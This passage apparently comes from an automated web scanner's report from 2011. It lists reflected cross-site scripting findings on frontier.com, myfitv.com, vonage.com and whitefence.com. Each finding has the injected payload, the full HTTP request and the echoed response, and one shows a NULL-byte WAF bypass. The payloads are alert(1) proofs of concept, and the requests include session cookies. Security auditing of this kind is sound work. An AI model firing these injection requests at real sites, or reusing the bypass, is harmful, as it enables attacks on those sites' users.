<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop293ac'-alert(1)-'b884da74b02dcdeaf/Login.aspx');//]]>
...[SNIP]...

2.100. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc7ba'-alert(1)-'0140388e784 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopcc7ba'-alert(1)-'0140388e784/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Shopcc7ba'-alert(1)-'0140388e784/Login.aspx');//]]>
...[SNIP]...

2.101. https://www.frontier.com/Shop/Login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66bbb'%3balert(1)//84be4a726c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66bbb';alert(1)//84be4a726c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop/Login.aspx?66bbb'%3balert(1)//84be4a726c9=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/Shop/Login.aspx?66bbb';alert(1)//84be4a726c9=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.102. http://www.myfitv.com/search [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003d6ce'%3balert(1)//9336b0fa1c5 was submitted in the query parameter. This input was echoed as 3d6ce';alert(1)//9336b0fa1c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search?utf8=%E2%9C%93&query=xss%003d6ce'%3balert(1)//9336b0fa1c5 HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:53:02 GMT
ETag: "64e6744e7db5d324afec0f75d50866d0"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIkYvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyUwMDNkNmNlJyUzYmFsZXJ0KDEpLy85MzM2YjBmYTFjNSIPc2Vzc2lvbl9pZCIlOGU3YzU1NTZjOWE3MTdkM2QzZDIzMDI5ZmE1Y2MyODI%3D--bb6a866ba6baf3100ee2ded8fc9da2d273d6affa; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.381151
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 31113
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
}
       })
   }

   function update_media_type() {
       if ($('#media_type') != 'Local') {
           $('#state').val('All')
           $('#city').val('All')
       }
       $('#query_form').submit();
   }
   
   $("#search_header").val('xss.3d6ce';alert(1)//9336b0fa1c5');
$("#search_header").addClass('black');
   

</script>
...[SNIP]...

2.103. http://www.vonage.com/search.php [lang_cntry parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the lang_cntry request parameter is copied into an HTML comment. The payload a9f48--><script>alert(1)</script>f9e759be4e4 was submitted in the lang_cntry parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_usa9f48--><script>alert(1)</script>f9e759be4e4 HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!-- extsearch.vonagenetworks.net/search?client=von_usa9f48--><script>alert(1)</script>f9e759be4e4_en_home&site=prod_sup_en_usa9f48-->
...[SNIP]...

2.104. http://www.vonage.com/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 58895--><script>alert(1)</script>b4b4607adfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=e/58895--><script>alert(1)</script>b4b4607adfbn_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!-- extsearch.vonagenetworks.net/search?client=von_us_e/58895--><script>alert(1)</script>b4b4607adfbn_home&site=prod_sup_e/58895-->
...[SNIP]...

2.105. http://www.vonage.com/search.php [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6</script><script>alert(1)</script>eae8d3091a9 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=xssb46c6</script><script>alert(1)</script>eae8d3091a9&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
on the custom 404 page - only takes one string value "errorPage"
       s.prop1=""
       s.prop10=""
       s.prop11="MainSite"
       s.prop12=""
       s.prop13=""
       s.prop14=""
       s.prop15=""
       s.prop43="xssb46c6</script><script>alert(1)</script>eae8d3091a9"
s.prop44="0"

       /* Hierarchy Variables */
       s.hier1="US/VDV/Vonagecom"
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_co
...[SNIP]...

2.106. http://www.vonage.com/search.php [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec63"><script>alert(1)</script>400bf562542 was submitted in the q parameter. This input was echoed as cec63\"><script>alert(1)</script>400bf562542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?q=xsscec63"><script>alert(1)</script>400bf562542&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<link rel="canonical" href="http://www.vonage.com/search.php?q=xsscec63\"><script>alert(1)</script>400bf562542" />
...[SNIP]...

2.107. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3bcd1--><img%20src%3da%20onerror%3dalert(1)>45f3ff68f71 was submitted in the REST URL parameter 2. This input was echoed as 3bcd1--><img src=a onerror=alert(1)>45f3ff68f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/high-speed-internet3bcd1--><img%20src%3da%20onerror%3dalert(1)>45f3ff68f71/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:50 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.high-speed-internet3bcd1--><img src=a onerror=alert(1)>45f3ff68f71 div#body div.description {
background: url(/objects/images/catBacks/980/high-speed-internet3bcd1-->
...[SNIP]...

2.108. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bef"><img%20src%3da%20onerror%3dalert(1)>affc43fb5c2 was submitted in the REST URL parameter 2. This input was echoed as 23bef"><img src=a onerror=alert(1)>affc43fb5c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/high-speed-internet23bef"><img%20src%3da%20onerror%3dalert(1)>affc43fb5c2/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:40 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view high-speed-internet23bef"><img src=a onerror=alert(1)>affc43fb5c2">
...[SNIP]...

2.109. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbfd8"%3bf1bc04b1680 was submitted in the REST URL parameter 2. This input was echoed as cbfd8";f1bc04b1680 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/high-speed-internetcbfd8"%3bf1bc04b1680/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:41 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-High-speed-internetcbfd8";f1bc04b1680";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.110. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 83293--><img%20src%3da%20onerror%3dalert(1)>7f06d62cba0 was submitted in the REST URL parameter 2. This input was echoed as 83293--><img src=a onerror=alert(1)>7f06d62cba0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/home-phone83293--><img%20src%3da%20onerror%3dalert(1)>7f06d62cba0/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
